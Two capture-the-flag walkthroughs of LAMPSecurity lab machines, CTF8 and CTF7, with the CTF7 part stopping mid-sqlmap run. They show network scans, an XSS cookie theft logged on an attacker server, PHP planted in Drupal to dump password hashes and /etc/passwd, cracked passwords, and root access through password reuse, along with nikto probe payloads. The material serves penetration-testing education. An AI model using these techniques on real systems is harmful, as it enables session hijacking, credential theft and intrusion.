Source Information

Author: madirish2600
Series: LAMPSecurity
Download: download.vulnhub.com/lampsecurity/ctf8.zip

“The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available here.”


Getting Started

“The secret of getting ahead is getting started.” –Mark twain

To start us off, let’s use arp-scan to ARP out across our local network and identify that the CTF8 box has leased the IP address 10.0.88.10.

calvinbebop@Dolos:~$ arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.88.1	52:54:00:12:35:00	QEMU
10.0.88.3	08:00:27:99:07:fb	Cadmus Computer Systems
10.0.88.2	52:54:00:12:35:00	QEMU
10.0.88.10	08:00:27:a5:48:e4	Cadmus Computer Systems

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 2.530 seconds (101.19 hosts/sec). 4 responded

Initial Service Enumeration

Next up, we’ll use Nmap to initiate a full TCP SYN scan of the CTF8 box (10.0.88.10) and search for some potential attack vectors in the system. A complete description of the tool’s flag usage can be found here. We’ll start by using the following flags:

Flag Description
-sS Utilize a TCP SYN scan
-sV Probe open ports to determine service/version info
-sC Run the default set of service scripts
-A Enable OS detection, version detection, script scanning, and traceroute
-p- Target all TCP ports from 1-65535
calvinbebop@Dolos:~$ sudo nmap -sS -sV -sC -A -p- 10.0.88.10
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-22 15:05 CST
Nmap scan report for 10.0.88.10
Host is up (0.00065s latency).
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0            4096 Jun 05  2013 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.0.88.5
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 2.0.5 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 5e:ca:64:f0:7f:d2:1a:a2:86:c6:1f:c2:2a:b3:6b:27 (DSA)
|_  2048 a3:39:2d:9f:66:96:0d:82:ad:52:1f:a1:dc:b1:f1:54 (RSA)
25/tcp   open  smtp        Sendmail
| smtp-commands: localhost.localdomain Hello [10.0.88.5], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp   open  http        Apache httpd 2.2.3 ((CentOS))
|_http-favicon: Drupal CMS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /sites/ /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /install.php /INSTALL.txt /LICENSE.txt 
|_/MAINTAINERS.txt
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: LAMPSecurity Research
443/tcp  open  ssl/https?
|_ssl-date: 2018-12-22T21:05:36+00:00; 0s from scanner time.
445/tcp  open  netbios-ssn Samba smbd 3.0.33-3.7.el5 (workgroup: WORKGROUP)
920/tcp  open  status      1 (RPC #100024)
3306/tcp open  mysql       MySQL (unauthorized)
5801/tcp open  vnc-http    RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5901)
|_http-server-header: RealVNC/4.0
|_http-title: VNC viewer for Java
5901/tcp open  vnc         VNC (protocol 3.8)
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|_    VNC Authentication (2)
MAC Address: 08:00:27:A5:48:E4 (Oracle VirtualBox virtual NIC)
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Service Info: OS: Unix

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m14s, median: 0s
|_nbstat: NetBIOS name: LAMPSEC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.33-3.7.el5)
|   Computer name: localhost
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: localhost.localdomain
|_  System time: 2018-12-22T16:05:39-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

FTP (21/TCP) Anonymous Access | Flag #1

One of the first things we may notice from the results of our Nmap scan is that not only is there an FTP service available, it also allows for an anonymous user login.

21/tcp   open  ftp         vsftpd 2.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0            4096 Jun 05  2013 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.0.88.5
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 2.0.5 - secure, fast, stable
|_End of status

Using Filezilla to login as the anonymous user, we are able to pull down our first flag!

#flag#5eb798d41d2e53295d34005f49113fc0

Unfortunately, it does not look like we’re able to use the anonymous user for uploads though.

Status:	Logged in
Status:	Starting upload of /var/www/html/reverseme.php
Command:	CWD /pub
Response:	250 Directory successfully changed.
Command:	TYPE A
Response:	200 Switching to ASCII mode.
Command:	PASV
Response:	227 Entering Passive Mode (10,0,88,10,39,103)
Command:	STOR reverseme.php
Response:	550 Permission denied.
Error:	Critical file transfer error

HTTP (80/TCP) Enumeration (Scanning)

Let’s go ahead and kick off a nikto scan of the web server in the background while we conduct a manual investigation of the site. There’s a plethora of useful information given to us from nikto, however we’ll focus on the manual investigation for now.

calvinbebop@Dolos:~$ nikto -h http://10.0.88.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.88.10
+ Target Hostname:    10.0.88.10
+ Target Port:        80
+ Start Time:         2018-12-22 16:15:42 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Retrieved x-powered-by header: PHP/5.1.6
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3268: /misc/: Directory indexing found.
+ OSVDB-3268: /modules/: Directory indexing found.
+ OSVDB-3268: /profiles/: Directory indexing found.
+ OSVDB-3268: /sites/: Directory indexing found.
+ OSVDB-3268: /themes/: Directory indexing found.
+ "robots.txt" contains 36 entries which should be manually viewed.
+ OSVDB-39272: favicon.ico file identifies this server as: Drupal 5.1.0
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found.
+ OSVDB-4806: /support/messages: Axis WebCam allows retrieval of messages file (/var/log/messages). See http://www.websec.org/adv/axis2400.txt.html
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /marketing/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /sales/: This might be interesting...
+ OSVDB-3092: /support/: This might be interesting...
+ OSVDB-3092: /user/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMail found
+ OSVDB-3093: /webmail/src/read_body.php: SquirrelMail found
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: Output from the phpinfo() function was found.
+ OSVDB-3092: /scripts/showuser.cgi: Shows the output of the 'whoami' command, which shows the web server user.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /webmail/src/configtest.php: Squirrelmail configuration test may reveal version and system info.
+ OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ OSVDB-81817: /?q[]=x: Drupal 7 contains a path information disclosure
+ /.git/config: Git config file found. Infos about repo details may be present.
+ 9175 requests: 0 error(s) and 80 item(s) reported on remote host
+ End Time:           2018-12-22 16:28:09 (GMT-6) (747 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

HTTP (80/TCP) Enumeration (Manual) | Flag #2

Welcome to CTF8’s primary website, LAMPSecurity Research.


Checking in on the source of the home page, we’re able to find our second flag!

#flag#550e1bafe077ff0b0b67f4e32f29d751

Navigating into one of the blog entries from the home page, we are able to see that the site allows for comment inputs from guests of the site.


In the spirit of breaking things, let’s attempt a basic test to check for XSS (Cross Site Scripting) vulnerabilities within the commenting system.


Bingo!


XSS Exploitation - Session Hijacking Attack

We’ll now attempt to use the XSS vulnerability we discovered to launch a session hijacking attack against the other user’s of the site. Firstly, we’ll need to setup an HTTP server on our local (attacker) machine to receive the incoming stolen session IDs/cookies.

calvinbebop@Dolos:~$ service apache2 start
calvinbebop@Dolos:~$ service apache2 status
 apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
   Active: active (running) since Sat 2018-12-22 17:27:06 CST; 34s ago
  Process: 28104 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
 Main PID: 28108 (apache2)
    Tasks: 7 (limit: 4915)
   Memory: 14.1M
   CGroup: /system.slice/apache2.service
           ├─28108 /usr/sbin/apache2 -k start
           ├─28109 /usr/sbin/apache2 -k start
           ├─28110 /usr/sbin/apache2 -k start
           ├─28111 /usr/sbin/apache2 -k start
           ├─28112 /usr/sbin/apache2 -k start
           ├─28113 /usr/sbin/apache2 -k start
           └─28114 /usr/sbin/apache2 -k start


We then submit a comment to the post with the following Javascript code snippet. When the victim’s browser executes this code, it will send an HTTP GET request to our attacker machine that includes the victim’s stolen session ID/cookie.


We can also see that this post was submitted by a user Barbara.


Using the site’s user contact page, we can send Barbara a link to the article to simulate a targeted attack.


After a few minutes, we can see our first batch of stolen cookies come in!

calvinbebop@Dolos:/var/log/apache2# sudo cat * | grep 22/Dec | grep -v "127.0.0.1" | grep -v "10.0.88.5"
10.0.88.10 - - [22/Dec/2018:18:12:02 -0600] "GET /SESSfc1bd34caa7d99af80db03d749397e53=j94qillr0ho22u8tafhq0bdvh4 HTTP/1.1" 404 553 "http://10.0.88.13/content/lampsec-point-security-available" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"
10.0.88.10 - - [22/Dec/2018:18:12:07 -0600] "GET /SESSfc1bd34caa7d99af80db03d749397e53=1d6o64k3ri88fogkku75vao8v6;%20has_js=1 HTTP/1.1" 404 563 "http://10.0.88.13/content/lampsec-point-security-available" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"


Using a cookie modification add-on for Firefox, we’re able to change our session ID value to the stolen value, 1d6o64k3ri88fogkku75vao8v6. This can also be accomplished using a proxy tool such as Burp.


And just like that, we’ve successfully hijacked Barbara’s session!


Exposing the Drupal Database

After hijacking Barbara’s web admin account, we now have the ability to create and post new content that includes PHP code. We’ll now attempt to create a post that contains PHP that will try to create a reverse webshell connection back to our attacker machine.


Unfortunately, it appears that the system account responsible for execution of this code has rather limited privileges as attempts to utilize PHP for connecting out via reverse webshell or opening a listening port to connect into the victim machine with both fail with a failure to daemonise error. However if we look closely though, we can identify that this server is running an instance of Drupal for its CMS.


Checking back to our intial web scans, we can actually find that Nikto identified this as an interesting point of investigation.

+ OSVDB-3092: /install.php: Drupal install.php file found.


Drupal also allows for dynamic code execution in Blocks. Let’s create a new block that will attempt to execute some PHP code to dump the usernames and passwords of every account in the Drupal database!


Success!


Hash Identification/Cracking

Using Hash-identifier (or an equivalent online tool), we’re able to determine that these are MD5 hashed strings.

calvinbebop@Dolos:~$ hash-identifier 
   #########################################################################
   #	 __  __ 		    		__		 	 ______    _____	       #
   #	/\ \/\ \		   		   /\ \ 		/\__  _\  /\  _ `\	       #
   #	\ \ \_\ \     __      ____ \ \ \___		\/_/\ \/  \ \ \/\ \	       #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R 							   #
   #							www.Blackploit.com 						   #
   #						       Root@Blackploit.com  				   #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: 25e4ee4e9229397b6b17776bfceaf8e7

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Luckily for us, MD5 hashes are relatively easy to crack and numerous online sources are happy to provide the “decrypted” strings for provided hashes.

Hash Result
25e4ee4e9229397b6b17776bfceaf8e7 adminpass
49265c16d1dff8acef3499bd889299d6 football123
bed128365216c019988915ed3add75fb passw0rd
2a5de0f53b1317f7e36afcdb6b5202a4 letmein!
08d15a4aef553492d8971cdd5198f314 drupal
c3319d1016a802db86653bcfab871f4f 1website
9b9e4bbd988954028a44710a50982576 superSun123
7d29975b78825ea7c27f5c0281ea2fa4 MonsterDrink
518462cd3292a67c755521c1fb50c909 4summer13
6dc523ebd2379d96cc0af32e2d224db0 1loveU
0d42223010b69cab86634bc359ed870b BobMarley
8f75ad3f04fc42f07c95e2f3d0ec3503 BaseballSeason
ed2b1f468c5f915f3f1cf75d7068baae 12341234
ca594f739e257245f2be69eb546c1c04 sitepass
85aca385eb555fb6a36a62915ddd8bc7 Seventy70
573152cc51de19df50e90b0e557db7fe swanson
c7a4476fc64b75ead800da9ea2b7d072 cherry
42248d4cb640a3fb5836571e254aee2b buddahbrother
971dcf53e88e9268714d9d504753d347 drupalpassword
3005d829eb819341357bfddf541c175b thundercats
7a1c07ff60f9c07ffe8da34ecbf4edc2 fantasy
7c6a180b36896a0a8c02787eeafb0e4c password1

Rooted - User Account Password Reuse

After attempting to login to each account using the available first names and our new set of passwords, it looks like the server is configured with user accounts using a different naming convention than just first names. A good way to get a list of configured usernames is by retrieving the /etc/passwd which may be possible by adding an include statement to our malicious PHP code block.


Aaaand success.


Excluding the account names that have limited direct access to a shell (as shown by the /sbin/nologin), we have a pretty decent list of accounts to attempt to authenticate against. Working our way down the list with our newly acquired password list at the ready, we can pretty quickly find ourselves SSH’d into the server and escalating to root without hassle.

calvinbebop@Dolos:~# ssh spinkton@10.0.88.10
Welcome to LAMPSecurity Research SSH access!
#flag#5e937c51b852e1ee90d42ddb5ccb8997

Unauthorized access is expected...
spinkton@10.0.88.10's password: 
Last login: Thu Mar 27 12:48:29 2014 from 192.168.56.1
#flag#motd-flag
[spinkton@localhost ~]$ sudo su
Password: 
[root@localhost spinkton]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=user_u:system_r:unconfined_t


EOL

Thank you for sticking around for this week’s boot2root. I think this box quite nicely illustrates how dangerous password reuse can really be!
As always, if you have any questions, corrections, or comments, please feel free to reach out to me on Twitter and have yourself an excellent day!


Source Information

Author: madirish2600
Series: LAMPSecurity
Download: download.vulnhub.com/lampsecurity/CTF7plusDocs.zip

“The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises (not just the latest one). Check the SourceForge site to find other exercises available here.”


Getting Started

“The way to get started is to quit talking and begin doing.” –Walt Disney

To get rolling, let’s use arp-scan to ARP out across our local network and identify that the CTF7 box has leased the IP address 10.0.88.9.

calvinbebop@Dolos:~$ ifconfig | grep inet
        inet 10.0.88.5  netmask 255.255.255.0  broadcast 10.0.88.255
        inet6 fe80::a00:27ff:feaa:650e  prefixlen 64  scopeid 0x20<link>
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
calvinbebop@Dolos:~$ arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.88.1	52:54:00:12:35:00	QEMU
10.0.88.2	52:54:00:12:35:00	QEMU
10.0.88.3	08:00:27:de:0a:10	CADMUS COMPUTER SYSTEMS
10.0.88.9	00:0c:29:9d:12:a9	VMware, Inc.

Initial Service Enumeration

We’ll now use Nmap to initiate a full TCP SYN scan of the CTF7 box (10.0.88.9) and search for some potential attack vectors in the system. A complete description of the tool’s flag usage can be found here. We’ll start by using the following flags:

Flag Description
-sS Utilize a TCP SYN scan
-sV Probe open ports to determine service/version info
-sC Run the default set of service scripts
-A Enable OS detection, version detection, script scanning, and traceroute
-p- Target all TCP ports from 1-65535
calvinbebop@Dolos:~$ sudo nmap -sS -sV -sC -A -p- 10.0.88.9
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-15 16:40 CST
Nmap scan report for 10.0.88.9
Host is up (0.00065s latency).
Not shown: 65526 filtered ports
PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 41:8a:0d:5d:59:60:45:c4:c4:15:f3:8a:8d:c0:99:19 (DSA)
|_  2048 66:fb:a3:b4:74:72:66:f4:92:73:8f:bf:61:ec:8b:35 (RSA)
80/tcp    open   http        Apache httpd 2.2.15 ((CentOS))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Mad Irish Hacking Academy
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.5.10-125.el6 (workgroup: MYGROUP)
901/tcp   open   http        Samba SWAT administration server
| http-auth: 
| HTTP/1.0 401 Authorization Required\x0D
|_  Basic realm=SWAT
|_http-title: 401 Authorization Required
5900/tcp  closed vnc
8080/tcp  open   http        Apache httpd 2.2.15 ((CentOS))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.2.15 (CentOS)
| http-title: Admin :: Mad Irish Hacking Academy
|_Requested resource was /login.php
10000/tcp open   http        MiniServ 1.610 (Webmin httpd)
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: MiniServ/1.610
|_http-title: Login to Webmin
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.13
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: 2h30m02s, deviation: 3h32m11s, median: 0s
| smb-os-discovery: 
|   OS: Unix (Samba 3.5.10-125.el6)
|   Computer name: localhost
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: localhost
|_  System time: 2018-12-15T17:43:32-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.65 ms 10.0.88.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 244.13 seconds

HTTP (80/TCP) Enumeration (Scanning)

There’s quite a few open services available for us to target with CTF7. For this walkthrough we’ll go ahead and kick off a nikto scan of the web server in the background while we conduct a manual investigation of CTF7’s first web application at 80/TCP.

calvinbebop@Dolos:~$ nikto -h http://10.0.88.9
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.88.9
+ Target Hostname:    10.0.88.9
+ Target Port:        80
+ Start Time:         2018-12-15 16:51:38 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.3.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Cookie roundcube_sessid created without the httponly flag
+ Uncommon header 'x-dns-prefetch-control' found, with contents: off
+ Uncommon header 'union all select filetoclob('/etc/passwd','server')' found, with contents: :html,0 FROM sysusers WHERE username=USER --/.html HTTP/1.1 404 Not Found
+ /servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ /servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ /servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ /servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
+ /nosuchurl/><script>alert('Vulnerable')</script>: JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html
+ /~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ /~/<script>alert('Vulnerable')</script>.aspx: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ /~/<script>alert('Vulnerable')</script>.asp: Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
+ /mailman/listinfo/<script>alert('Vulnerable')</script>: Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-27095: /bb000001.pl<script>alert('Vulnerable')</script>: Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-54589: /a.jsp/<script>alert('Vulnerable')</script>: JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. http://www.cert.org/advisories/CA-2000-02.html.
+ /<script>alert('Vulnerable')</script>.thtml: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /<script>alert('Vulnerable')</script>.shtml: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /<script>alert('Vulnerable')</script>.jsp: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /<script>alert('Vulnerable')</script>.aspx: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-6662: /<script>alert('Vulnerable')</script>: Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ Server leaks inodes via ETags, header found with file /webalizer/, inode: 283452, size: 3709, mtime: Mon Dec 24 15:44:07 2012
+ OSVDB-682: /webalizer/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3483: /docs/<script>alert('Vulnerable');</script>: Nokia Electronic Documentation is vulneable to Cross Site Scripting (XSS). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0801.
+ OSVDB-6659: /zv6E0CNhAcgWGUnDKkQAvrU16FyigbEUGSGwnEPhaYzCkwhQH0THiZUfa8MumYkwWIergQVEmbfC0qPuf0EprHLgSt8QSZe3uwrbC1t74c6ALf3zh6nQmwAqDqN1F6R5blSGew63m1SG6uHTS3faOGt9detppZ1fHihMtu80pW5vk6hcE9arX6XHyN02TE3VLrflmymKTA5atN9wom6WXoRSsLl7use<font%20size=50>
+ OSVDB-701: /pls/help/<script>alert('Vulnerable')</script>: Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Uncommon header '-al&absolute_path_studip=http' found, with contents: //cirt.net/rfiinc.txt?? HTTP/1.1 404 Not Found
+ Uncommon header '-al&_phplib[libdir]=http' found, with contents: //cirt.net/rfiinc.txt?? HTTP/1.1 404 Not Found
+ 8346 requests: 0 error(s) and 41 item(s) reported on remote host
+ End Time:           2018-12-15 16:52:07 (GMT-6) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

HTTP (80/TCP) Manual Investigation

Welcome to CTF7’s homepage, the Mad Irish Hacking Academy.

An initial audit of the available HTML source doesn’t turn up much so let’s move on to creating an account in the web application so we can get access to a number of the restricted pages.

Our first available page under Resources is for training registration. We can also see that the application is using an id HTTP parameter to specify requests for the training registration page.

After some manual fandangling with the id parameter and pointing sqlmap at it (with our authenticated cookie), the training registration page’s id parameter does not appear to be injectable.

calvinbebop@Dolos:~$ sqlmap -u "http://10.0.88.9/register&id=2" -p id --cookie="PHPSESSID=407rm89j7cj9js4c3i9ma6s600"
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.2.7#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:49:53

[17:49:53] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[17:50:11] [INFO] testing connection to the target URL
[17:50:11] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[17:50:11] [INFO] testing if the target URL content is stable
[17:50:12] [INFO] target URL content is stable
[17:50:12] [INFO] testing if URI parameter '#1*' is dynamic
[17:50:12] [WARNING] URI parameter '#1*' does not appear to be dynamic
[17:50:12] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[17:50:12] [INFO] testing for SQL injection on URI parameter '#1*'
[17:50:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:50:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[17:50:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:50:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:50:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[17:50:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[17:50:12] [WARNING] reflective value(s) found and filtering out
[17:50:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[17:50:12] [INFO] testing 'MySQL inline queries'
[17:50:12] [INFO] testing 'PostgreSQL inline queries'
[17:50:12] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:50:12] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[17:50:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
